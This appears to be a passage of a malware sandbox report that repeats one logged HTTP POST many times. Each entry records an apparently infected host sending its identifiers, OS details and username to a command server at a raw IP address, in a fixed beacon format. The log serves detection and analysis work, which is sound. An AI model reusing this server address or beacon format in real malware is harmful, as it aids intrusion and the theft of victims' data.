                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
